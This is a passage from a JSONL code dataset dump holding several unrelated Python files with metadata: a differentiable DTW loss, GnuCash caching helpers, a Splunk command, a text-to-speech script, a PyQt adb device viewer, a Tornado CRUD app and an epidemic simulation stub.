1))\n for j in jrange:\n min_list = D0[i, j]\n for k in range(1, warp + 1):\n # print(i+k, r)\n i_k = min(i + k, r)\n j_k = min(j + k, c)\n min_list = T.cat((T.tensor([min_list], requires_grad=True), \\\n T.tensor([D0[i_k, j] * s], requires_grad=True), \\\n T.tensor([D0[i, j_k] * s], requires_grad=True)))\n # Softmin is NOT a smooth min function\n min_val = smooth_min(min_list, rho)\n # print('min:', i, j, min_val, min_list)\n D1[i, j] = D1[i, j] + min_val\n if len(x) == 1:\n path = zeros(len(y)), range(len(y))\n elif len(y) == 1:\n path = range(len(x)), zeros(len(x))\n else:\n path = _traceback(D0)\n return D1[-1, -1], C, D1, path\n\n\n\nx = np.array([2, 0, 1, 1, 2, 4, 2, 1, 2, 0], dtype=np.float32).reshape(-1, 1)\ny = np.array([1, 1, 2, 4, 2, 1, 2, 0], dtype=np.float32).reshape(-1, 1)\n\n\ntensor_x = T.tensor(T.from_numpy(x), requires_grad=True)\ntensor_y = T.tensor(T.from_numpy(y), requires_grad=True)\n\n\neuclidean_norm = lambda x, y: T.abs(x - y)\n\n#diff_d, diff_cost_matrix, diff_acc_cost_matrix, diff_path = diff_dtw_loss(tensor_x, tensor_y, dist=euclidean_norm)\n\n#print('distance', diff_d, 'diff distance:', diff_d.detach().numpy())\n#diff_acc_cost_matrix = diff_acc_cost_matrix.detach().numpy()\n# print(acc_cost_matrix)\n\n\n# You can also visualise the accumulated cost and the shortest path\nimport matplotlib.pyplot as plt\n\n#fig, (ax1, ax2) = plt.subplots(1, 2)\n#fig.suptitle('Original and Differentiable Accumated Cost Matrix')\n#ax1.imshow(acc_cost_matrix.T, origin='lower', cmap='gray', interpolation='nearest')\n#ax1.plot(path[0], path[1], 'w')\n#ax2.imshow(diff_acc_cost_matrix.T, origin='lower', cmap='gray', interpolation='nearest')\n#ax2.plot(diff_path[0], diff_path[1], 'w')\n\n\n# plt.imshow(acc_cost_matrix.T, origin='lower', cmap='gray', interpolation='nearest')\n# plt.plot(path[0], path[1], 'w')\n# plt.show()\n\n\nimport torch as T\nfrom torch.nn import functional as F\n\nfrom torch.nn.modules import Module\n\nclass _Loss(Module):\n def __init__(self, size_average=None, reduce=None, reduction='mean', _Reduction=None):\n super(_Loss, self).__init__()\n if size_average is not None or reduce is not None:\n self.reduction = _Reduction.legacy_get_string(size_average, reduce)\n else:\n self.reduction = reduction\n\n\nclass DTW_Loss(_Loss):\n def __init__(self, rho=10, size_average=None, reduce=None, reduction='mean'):\n super(DTW_Loss, self).__init__(size_average, reduce, reduction)\n self.rho = rho\n\n def forward(self, output, target):\n # batch x seq_len x dim\n if ndim(output)==3:\n dist = []\n for b in range(output.size(0)):\n #print(\"sizes\", output.size(), target.size())\n d_b, cost_matrix, diff_acc_cost_matrix, diff_path = diff_dtw_loss(output[b], target[b], dist=euclidean_norm, rho=rho)\n dist.append(d_b)\n d = T.mean(T.stack(dist))\n else:\n d, cost_matrix, diff_acc_cost_matrix, diff_path = diff_dtw_loss(output, target, dist=euclidean_norm, rho=rho)\n #F.mse_loss(output, target, reduction=self.reduction)\n loss_val = d #.detach().numpy()\n return loss_val\n\nx = np.array([2, 0, 1, 1, 2, 4, 2, 1, 2, 0], dtype=np.float32).reshape(1, -1, 1)\ny = np.array([1, 1, 2, 4, 2, 1, 2, 0], dtype=np.float32).reshape(1, -1, 1)\n\ntensor_x = T.tensor(T.from_numpy(x),requires_grad=True)\ntensor_y = T.tensor(T.from_numpy(y),requires_grad=True)\nloss_vals = []\n\nrhos = np.linspace(1, 10,10)\n#for rho in rhos:\n #print(rho)\n #my_loss = DTW_Loss(rho)\n #loss_vals.append(my_loss(tensor_x, tensor_y))\n", "sub_path": "Peg In Hole HDR-IL/differentiableDP.py", "file_name": "differentiableDP.py", "file_ext": "py", "file_size_in_byte": 8531, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "numpy.array", "line_number": 11, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.inf", "line_number": 26, "usage_type": "name"}, {"api_name": "math.isinf", "line_number": 39, "usage_type": "call"}, {"api_name": "math.isinf", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.full", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.inf", "line_number": 43, "usage_type": "argument"}, {"api_name": "numpy.zeros", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.inf", "line_number": 49, "usage_type": "name"}, {"api_name": "numpy.inf", "line_number": 50, "usage_type": "name"}, {"api_name": "math.isinf", "line_number": 54, "usage_type": "call"}, {"api_name": "math.isinf", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 71, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 80, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 81, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 84, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 92, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 92, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 93, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 93, "usage_type": "name"}, {"api_name": "torch.log", "line_number": 102, "usage_type": "call"}, {"api_name": "torch.mean", "line_number": 102, "usage_type": "call"}, {"api_name": "torch.exp", "line_number": 102, "usage_type": "call"}, {"api_name": "torch.mean", "line_number": 103, "usage_type": "call"}, {"api_name": "torch.exp", "line_number": 103, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 107, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 116, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 119, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 129, "usage_type": "call"}, {"api_name": "numpy.inf", "line_number": 132, "usage_type": "name"}, {"api_name": "math.isinf", "line_number": 141, "usage_type": "call"}, {"api_name": "math.isinf", "line_number": 147, "usage_type": "call"}, {"api_name": "torch.full", "line_number": 148, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 153, "usage_type": "call"}, {"api_name": "math.isinf", "line_number": 160, "usage_type": "call"}, {"api_name": "math.isinf", "line_number": 165, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 173, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 173, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 174, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 175, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 181, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 183, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 190, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 190, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 191, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 191, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 194, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 194, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 195, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 195, "usage_type": "call"}, {"api_name": "torch.abs", "line_number": 198, "usage_type": "call"}, {"api_name": "torch.nn.modules.Module", "line_number": 228, "usage_type": "name"}, {"api_name": "numpy.ndim", "line_number": 244, "usage_type": "call"}, {"api_name": "torch.mean", "line_number": 250, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 250, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 257, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 257, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 258, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 258, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 260, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 260, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 261, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 261, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 264, "usage_type": "call"}]}
+{"seq_id": "548821273", "text": "import cPickle\nimport gzip\nimport os.path\nimport sys\nfrom subprocess import PIPE, Popen\nfrom warnings import warn\n\nimport yaml\n\nfrom koert.gnucash.xmlformat import SaxHandler\n\n\ndef open_gcf_in_git_repo(repopath, filepath, cachepath=None, scheme=None):\n from git import Repo\n\n repo = Repo(repopath)\n commit = repo.head.commit\n mtime = commit.authored_date\n f = commit.tree[filepath].data_stream\n\n result = parse_gcf(f, mtime, cachepath=cachepath, scheme=scheme)\n\n f.read()\n\n return result\n\n\ndef open_pos_gzipped(filepath):\n f = None\n try:\n # Only after a byte is read, is the check whether filepath\n # points to a gzipped file performed.\n f = gzip.open(filepath)\n f.read(1)\n f.rewind()\n except IOError:\n # message should read: \"Not a gzipped file\"\n f = open(filepath)\n return f\n\n\ndef saxparse(f, handler):\n from xml.sax import parse as saxparse\n saxparse(f, handler)\n\n\ndef lxmlparse(f, handler):\n from lxml.etree import parse as lxmlparse\n from lxml.sax import saxify\n etree = lxmlparse(f)\n saxify(etree, handler)\n\n\ndef cache_path(filepath):\n return filepath + \".pickled\"\n\n\ndef get_commit_name():\n directory = os.path.dirname(__file__)\n p = Popen('git rev-parse HEAD',\n stdout=PIPE, shell=True, cwd=directory)\n outp, err = p.communicate()\n return outp\n\n\ndef load_cache(cachepath, mtime):\n if not os.path.exists(cachepath):\n return False\n # Do not use the cache if the gnucash file is newer\n if mtime >= os.path.getmtime(cachepath):\n return False\n with open(cachepath, \"r\") as f:\n current_commit_name = get_commit_name()\n try:\n cached_commit_name, gcf = cPickle.load(f)\n if cached_commit_name != current_commit_name:\n return False\n print(\"loaded cache %s\" % cachepath)\n return gcf\n except Exception as e:\n warn(\"Failed to load pickled cache of Gnucash file \"\n \"'%s': %s\" % (cachepath, repr(e)))\n return False\n\n\ndef update_cache(cachepath, gcf):\n if sys.getrecursionlimit() < 2000:\n sys.setrecursionlimit(2000)\n with open(cachepath, \"w\") as f:\n try:\n cPickle.dump((get_commit_name(), gcf), f)\n except RuntimeError as e:\n warn(\"\"\"Failed to dump a pickled version of the \\\ngnucash file \"%s\" due to the RuntimeError below. If this is a stack \\\noverflow, you might want to increase the maximum recursion depth by \\\nsys.setrecursionlimit.\"\"\")\n raise e\n\n\ndef parse_gcf(f, mtime, scheme=None, parse=saxparse, cachepath=None):\n if cachepath is not None:\n result = load_cache(cachepath, mtime)\n if result:\n return result\n handler = SaxHandler(scheme)\n parse(f, handler)\n result = handler.result\n result.mtime = mtime\n update_cache(cachepath, result)\n return result\n\n\ndef open_gcf(filepath, scheme=None, parse=saxparse, cachepath=None):\n if cachepath is None:\n cachepath = cache_path(filepath)\n with open(filepath) as f:\n return parse_gcf(f, os.path.getmtime(filepath),\n scheme=scheme, parse=parse, cachepath=cachepath)\n\n\ndef open_yaml(path):\n with open(path) as f:\n d = yaml.load(f)\n\n dirname = os.path.dirname(path)\n gcf_path = os.path.join(dirname, d['path'])\n cache_path = None\n if \"cache\" in d:\n cache_path = os.path.join(dirname, d['cache'])\n gcf = None\n if 'repo' in d:\n repo_path = os.path.join(dirname, d['repo'])\n gcf = open_gcf_in_git_repo(repo_path, d['path'], cachepath=cache_path)\n else:\n gcf = open_gcf(gcf_path, cachepath=cache_path)\n if 'meta' in d:\n gcf.meta = d['meta']\n\n return gcf\n", "sub_path": "sm/gnucash/tools.py", "file_name": "tools.py", "file_ext": "py", "file_size_in_byte": 3788, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "git.Repo", "line_number": 16, "usage_type": "call"}, {"api_name": "gzip.open", "line_number": 33, "usage_type": "call"}, {"api_name": "xml.sax.parse", "line_number": 44, "usage_type": "call"}, {"api_name": "lxml.etree.parse", "line_number": 50, "usage_type": "call"}, {"api_name": "lxml.sax.saxify", "line_number": 51, "usage_type": "call"}, {"api_name": "os.path.path.dirname", "line_number": 59, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 59, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 59, "usage_type": "name"}, {"api_name": "subprocess.Popen", "line_number": 60, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 61, "usage_type": "name"}, {"api_name": "os.path.path.exists", "line_number": 67, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 67, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 67, "usage_type": "name"}, {"api_name": "os.path.path.getmtime", "line_number": 70, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 70, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 70, "usage_type": "name"}, {"api_name": "cPickle.load", "line_number": 75, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 81, "usage_type": "call"}, {"api_name": "sys.getrecursionlimit", "line_number": 87, "usage_type": "call"}, {"api_name": "sys.setrecursionlimit", "line_number": 88, "usage_type": "call"}, {"api_name": "cPickle.dump", "line_number": 91, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 93, "usage_type": "call"}, {"api_name": "xml.sax.parse", "line_number": 100, "usage_type": "name"}, {"api_name": "koert.gnucash.xmlformat.SaxHandler", "line_number": 105, "usage_type": "call"}, {"api_name": "xml.sax.parse", "line_number": 113, "usage_type": "name"}, {"api_name": "os.path.path.getmtime", "line_number": 117, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 117, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 117, "usage_type": "name"}, {"api_name": "yaml.load", "line_number": 123, "usage_type": "call"}, {"api_name": "os.path.path.dirname", "line_number": 125, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 125, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 125, "usage_type": "name"}, {"api_name": "os.path.path.join", "line_number": 126, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 126, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 126, "usage_type": "name"}, {"api_name": "os.path.path.join", "line_number": 129, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 129, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 129, "usage_type": "name"}, {"api_name": "os.path.path.join", "line_number": 132, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 132, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 132, "usage_type": "name"}]}
+{"seq_id": "190884705", "text": "import sys\nimport json\nfrom splunklib.searchcommands import dispatch, StreamingCommand, Configuration, Option\nfrom splunklib.searchcommands.validators import Fieldname\nimport environment_data\n\n\n@Configuration(local=True)\nclass EnvironmentInstancesUpdateState(StreamingCommand):\n\n state_field = Option(validate=Fieldname())\n name_field = Option(validate=Fieldname())\n\n def stream(self, instances):\n for instance in instances:\n environment_id = instance[\"environment_id\"]\n instance_state = instance[self.state_field]\n instance_name = instance[self.name_field]\n\n self.service.post(\"/services/msaas/environments/%s/instances/%s\" % (environment_id, instance_name), body=json.dumps({\n \"state\": instance_state,\n }))\n # environment_data.update_instance(\n # self.service, environment_id, instance_name,\n # instance_state=instance_state)\n yield instance\n\ndispatch(EnvironmentInstancesUpdateState,\n sys.argv, sys.stdin, sys.stdout, __name__)\n", "sub_path": "apps/msaas/bin/environment_instances_update_state_command.py", "file_name": "environment_instances_update_state_command.py", "file_ext": "py", "file_size_in_byte": 1069, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "splunklib.searchcommands.StreamingCommand", "line_number": 9, "usage_type": "name"}, {"api_name": "splunklib.searchcommands.Option", "line_number": 11, "usage_type": "call"}, {"api_name": "splunklib.searchcommands.validators.Fieldname", "line_number": 11, "usage_type": "call"}, {"api_name": "splunklib.searchcommands.Option", "line_number": 12, "usage_type": "call"}, {"api_name": "splunklib.searchcommands.validators.Fieldname", "line_number": 12, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 20, "usage_type": "call"}, {"api_name": "splunklib.searchcommands.Configuration", "line_number": 8, "usage_type": "call"}, {"api_name": "splunklib.searchcommands.dispatch", "line_number": 28, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 29, "usage_type": "attribute"}, {"api_name": "sys.stdin", "line_number": 29, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 29, "usage_type": "attribute"}]}
+{"seq_id": "210347852", "text": "import os\nos.environ[\"GOOGLE_APPLICATION_CREDENTIALS\"] = './config/My Project-bd8af4dfa881.json'\nfrom google.cloud import texttospeech\nimport base64\nimport subprocess\nfrom pydub import AudioSegment\nfrom pydub.playback import play\nimport io\n\n\n\ndef create_google_sst(text):\n client = texttospeech.TextToSpeechClient()\n synthesis_input = texttospeech.types.SynthesisInput(text=text)\n voice = texttospeech.types.VoiceSelectionParams(\n name=\"en-US-Wavenet-F\",\n language_code='en-US', \n ssml_gender=texttospeech.enums.SsmlVoiceGender.FEMALE\n )\n audio_config = texttospeech.types.AudioConfig(\n audio_encoding=texttospeech.enums.AudioEncoding.MP3,\n pitch=2.0,\n speaking_rate=1.26\n )\n \n response = client.synthesize_speech(synthesis_input, voice, audio_config)\n audio = base64.b64decode(response.audio_content)\n\n song = AudioSegment.from_file(io.BytesIO(audio), format=\"mp3\")\n play(song)\n\ncreate_google_sst(\"how can I help you ?\")", "sub_path": "scrath.py", "file_name": "scrath.py", "file_ext": "py", "file_size_in_byte": 1028, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.environ", "line_number": 2, "usage_type": "attribute"}, {"api_name": "google.cloud.texttospeech.TextToSpeechClient", "line_number": 13, "usage_type": "call"}, {"api_name": "google.cloud.texttospeech", "line_number": 13, "usage_type": "name"}, {"api_name": "google.cloud.texttospeech.types.SynthesisInput", "line_number": 14, "usage_type": "call"}, {"api_name": "google.cloud.texttospeech.types", "line_number": 14, "usage_type": "attribute"}, {"api_name": "google.cloud.texttospeech", "line_number": 14, "usage_type": "name"}, {"api_name": "google.cloud.texttospeech.types.VoiceSelectionParams", "line_number": 15, "usage_type": "call"}, {"api_name": "google.cloud.texttospeech.types", "line_number": 15, "usage_type": "attribute"}, {"api_name": "google.cloud.texttospeech", "line_number": 15, "usage_type": "name"}, {"api_name": "google.cloud.texttospeech.enums", "line_number": 18, "usage_type": "attribute"}, {"api_name": "google.cloud.texttospeech", "line_number": 18, "usage_type": "name"}, {"api_name": "google.cloud.texttospeech.types.AudioConfig", "line_number": 20, "usage_type": "call"}, {"api_name": "google.cloud.texttospeech.types", "line_number": 20, "usage_type": "attribute"}, {"api_name": "google.cloud.texttospeech", "line_number": 20, "usage_type": "name"}, {"api_name": "google.cloud.texttospeech.enums", "line_number": 21, "usage_type": "attribute"}, {"api_name": "google.cloud.texttospeech", "line_number": 21, "usage_type": "name"}, {"api_name": "base64.b64decode", "line_number": 27, "usage_type": "call"}, {"api_name": "pydub.AudioSegment.from_file", "line_number": 29, "usage_type": "call"}, {"api_name": "pydub.AudioSegment", "line_number": 29, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 29, "usage_type": "call"}, {"api_name": "pydub.playback.play", "line_number": 30, "usage_type": "call"}]}
+{"seq_id": "620220901", "text": "import sys, subprocess\nfrom PyQt5.QtWidgets import QWidget, QVBoxLayout, QHBoxLayout, QTreeWidget, QTreeWidgetItem, QGroupBox, QPushButton, QApplication\nfrom PyQt5 import QtCore\n\nclass MyApp(object): \n def __init__(self):\n super(MyApp, self).__init__() \n self.mainWidget = QWidget()\n self.mainLayout = QVBoxLayout()\n self.mainWidget.setLayout(self.mainLayout)\n\n self.hLayout = QHBoxLayout()\n self.mainLayout.insertLayout(0, self.hLayout)\n\n\n self.listA=QTreeWidget()\n self.listA.setColumnCount(3)\n self.listA.setHeaderLabels(['Checkbox','Name','Data'])\n for i in range(3):\n item=QTreeWidgetItem()\n item.setCheckState(0, 2)\n item.setText(1, 'Item '+str(i))\n item.setData(2, 256, id(item) )\n item.setText(2, str(id(item) ) )\n self.listA.addTopLevelItem(item)\n\n self.hLayout.addWidget(self.listA)\n\n self.buttonGroupbox = QGroupBox()\n self.buttonlayout = QVBoxLayout()\n self.buttonGroupbox.setLayout(self.buttonlayout)\n\n okButton = QPushButton('Remove Selected')\n okButton.clicked.connect(self.removeSel)\n self.buttonlayout.addWidget(okButton)\n\n getDataButton = QPushButton('Get Items Data')\n getDataButton.clicked.connect(self.getItemsData)\n self.buttonlayout.addWidget(getDataButton)\n\n self.mainLayout.addWidget(self.buttonGroupbox)\n self.mainWidget.show()\n sys.exit(app.exec_())\n\n def removeSel(self):\n listItems = []\n for i in range(self.listA.topLevelItemCount()):\n item=self.listA.topLevelItem(i)\n print(\"item\", item)\n if (item.checkState(0) == 2):\n listItems.append(item)\n\n print(\"listItems: \",listItems)\n\n for item in listItems:\n print(\"item: \", item)\n itemIndex=self.listA.indexOfTopLevelItem(item)\n print(\"itemIndex\", itemIndex)\n self.listA.takeTopLevelItem(itemIndex)\n print('\\n\\t Number of items remaining', self.listA.topLevelItemCount())\n\n def getItemsData(self):\n for i in range(self.listA.topLevelItemCount()):\n item=self.listA.topLevelItem(i)\n itmData=item.data(2, 256)\n print('\\n\\t Item Id Stored as Item Data:', itmData, 'Item Checkbox State:', item.checkState(0))\n\nif __name__ == '__main__':\n what = subprocess.Popen(['adb', 'devices', '-l'], stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n out, errs = what.communicate()\n out = str(out, 'utf-8')\n outs = out.split()\n del outs[0:4]\n length = len(outs)\n n = length/6\n struct = [[] for i in range(int(n))]\n for i in range(int(n)):\n print(n, i)\n struct[i] = outs[i*6:(i+1)*6]\n print(struct[i])\n app = QApplication(sys.argv)\n MyApp()", "sub_path": "PythGUI/gui2.py", "file_name": "gui2.py", "file_ext": "py", "file_size_in_byte": 2871, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "PyQt5.QtWidgets.QWidget", "line_number": 8, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QVBoxLayout", "line_number": 9, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QHBoxLayout", "line_number": 12, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QTreeWidget", "line_number": 16, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QTreeWidgetItem", "line_number": 20, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QGroupBox", "line_number": 29, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QVBoxLayout", "line_number": 30, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 33, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 37, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 43, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 69, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 69, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets.QApplication", "line_number": 81, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 81, "usage_type": "attribute"}]}
+{"seq_id": "617248015", "text": "import tornado.ioloop\nimport tornado.web\nimport psycopg2.extras\nimport notorm\nimport tornado.autoreload\n\nclass Game(notorm.record):\n _fields = {'id':None,\n 'name':None\n }\n\n insert_qry = \"\"\"\n insert into game (name)\n values(%(name)s)\n returning id\n \"\"\"\n\n update_qry = \"\"\"\n update game set name=%(name)s where id = %(id)s\n \"\"\"\n\n @classmethod\n def get(cls, game_id):\n cursor = notorm.db.cursor(cursor_factory=psycopg2.extras.NamedTupleCursor)\n cursor.execute(\"\"\"select game.*::game from game where id = %(game_id)s\"\"\",\n {'game_id': game_id})\n\n results = cursor.fetchall()\n games = notorm.build_relationships(results, 'game')\n if not games:\n return None\n return games[0]\n\n @classmethod\n def get_all(cls):\n cursor = notorm.db.cursor(cursor_factory=psycopg2.extras.NamedTupleCursor)\n cursor.execute(\"\"\"select game.*::game from game order by name\"\"\")\n\n results = cursor.fetchall()\n games = notorm.build_relationships(results, 'game')\n return games\n\nclass GameComposite(psycopg2.extras.CompositeCaster):\n def make(self, values):\n d = dict(zip(self.attnames, values))\n return Game(**d)\n\nclass ExampleRequestHandler(tornado.web.RequestHandler):\n def on_finish(self):\n notorm.db.commit()\n\n def log_exception(self, typ, value, tb):\n print(\"Exception\")\n notorm.db.rollback()\n return super(ExampleRequestHandler, self).log_exception(typ, value, tb)\n\nclass MainHandler(ExampleRequestHandler):\n def get(self):\n games = Game.get_all()\n self.render(\"../main.html\", games=games)\n\nclass GameHandler(ExampleRequestHandler):\n def get(self, game_id=None):\n if game_id:\n game = Game.get(game_id)\n else:\n game = Game()\n self.render(\"../edit.html\", game=game)\n\n def post(self, game_id=None):\n if game_id:\n game = Game.get(game_id)\n else:\n game = Game()\n game.name = self.get_argument('name')\n game.save()\n self.redirect(\"/\")\n\ndef make_app():\n return tornado.web.Application([\n (r\"/\", MainHandler),\n (r\"/game/new\", GameHandler),\n (r\"/game/([0-9]+)\", GameHandler)\n ])\n\nif __name__ == \"__main__\":\n notorm.db = psycopg2.connect(\"dbname=notorm_example user=dbuser\")\n\n cursor = notorm.db.cursor()\n psycopg2.extras.register_composite('game', cursor, globally=True, factory = GameComposite)\n app = make_app()\n app.listen(8888)\n tornado.autoreload.start(tornado.ioloop.IOLoop.current())\n tornado.ioloop.IOLoop.current().start()", "sub_path": "examples/tornadosync/tornadosync.py", "file_name": "tornadosync.py", "file_ext": "py", "file_size_in_byte": 2690, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "notorm.record", "line_number": 7, "usage_type": "attribute"}, {"api_name": "notorm.db.cursor", "line_number": 24, "usage_type": "call"}, {"api_name": "notorm.db", "line_number": 24, "usage_type": "attribute"}, {"api_name": "psycopg2.extras.extras", "line_number": 24, "usage_type": "attribute"}, {"api_name": "psycopg2.extras", "line_number": 24, "usage_type": "name"}, {"api_name": "notorm.build_relationships", "line_number": 29, "usage_type": "call"}, {"api_name": "notorm.db.cursor", "line_number": 36, "usage_type": "call"}, {"api_name": "notorm.db", "line_number": 36, "usage_type": "attribute"}, {"api_name": "psycopg2.extras.extras", "line_number": 36, "usage_type": "attribute"}, {"api_name": "psycopg2.extras", "line_number": 36, "usage_type": "name"}, {"api_name": "notorm.build_relationships", "line_number": 40, "usage_type": "call"}, {"api_name": "psycopg2.extras.extras", "line_number": 43, "usage_type": "attribute"}, {"api_name": "psycopg2.extras", "line_number": 43, "usage_type": "name"}, {"api_name": "tornado.ioloop.web", "line_number": 48, "usage_type": "attribute"}, {"api_name": "tornado.ioloop", "line_number": 48, "usage_type": "name"}, {"api_name": "notorm.db.commit", "line_number": 50, "usage_type": "call"}, {"api_name": "notorm.db", "line_number": 50, "usage_type": "attribute"}, {"api_name": "notorm.db.rollback", "line_number": 54, "usage_type": "call"}, {"api_name": "notorm.db", "line_number": 54, "usage_type": "attribute"}, {"api_name": "tornado.ioloop.web.Application", "line_number": 80, "usage_type": "call"}, {"api_name": "tornado.ioloop.web", "line_number": 80, "usage_type": "attribute"}, {"api_name": "tornado.ioloop", "line_number": 80, "usage_type": "name"}, {"api_name": "notorm.db", "line_number": 87, "usage_type": "attribute"}, {"api_name": "psycopg2.extras.connect", "line_number": 87, "usage_type": "call"}, {"api_name": "psycopg2.extras", "line_number": 87, "usage_type": "name"}, {"api_name": "notorm.db.cursor", "line_number": 89, "usage_type": "call"}, {"api_name": "notorm.db", "line_number": 89, "usage_type": "attribute"}, {"api_name": "psycopg2.extras.extras.register_composite", "line_number": 90, "usage_type": "call"}, {"api_name": "psycopg2.extras.extras", "line_number": 90, "usage_type": "attribute"}, {"api_name": "psycopg2.extras", "line_number": 90, "usage_type": "name"}, {"api_name": "tornado.ioloop.autoreload.start", "line_number": 93, "usage_type": "call"}, {"api_name": "tornado.ioloop.autoreload", "line_number": 93, "usage_type": "attribute"}, {"api_name": "tornado.ioloop", "line_number": 93, "usage_type": "name"}, {"api_name": "tornado.ioloop.ioloop.IOLoop.current", "line_number": 93, "usage_type": "call"}, {"api_name": "tornado.ioloop.ioloop", "line_number": 93, "usage_type": "attribute"}, {"api_name": "tornado.ioloop.ioloop.IOLoop.current", "line_number": 94, "usage_type": "call"}, {"api_name": "tornado.ioloop.ioloop", "line_number": 94, "usage_type": "attribute"}, {"api_name": "tornado.ioloop", "line_number": 94, "usage_type": "name"}]}
+{"seq_id": "545420405", "text": "import random\nfrom datetime import datetime, timedelta\n\nfrom Person import Person\n\n\nclass Place:\n\n def __init__(self, place_info):\n self.population = set()\n self.place_info = place_info # (40.760265, -73.989105, 'Italian', '217', '291', 'Ristorante Da Rosina')\n self.time_to_recover = 14\n self.total_infected_number = 0\n self.immune_population = set()\n\n def get_population(self):\n return self.population\n\n def get_total_infected(self):\n return self.total_infected_number\n\n def set_population(self, new_population):\n self.population = new_population\n\n def set_total_movements(self, number):\n self.total_movements = number\n self.init_population(self.total_movements) # initilise population according to place popularity\n\n def init_population(self, number):\n start_time = datetime(2010, 12, 21, 20, 0, 0)\n for i in range(number):\n person = Person()\n # infect with a certain probability\n if random.random() <= 0.001:\n person.set_infected(start_time)\n self.add_person(person)\n\n def get_total_movements(self):\n return self.total_movements\n\n def add_person(self, person):\n self.population.add(person)\n\n def incubate_cycle(self, current_time_o):\n ''' Process local population at a place and yield a new cycle of infections '''\n\n # set recovered timedelta(days=1): set time_to_recover, current_time\n 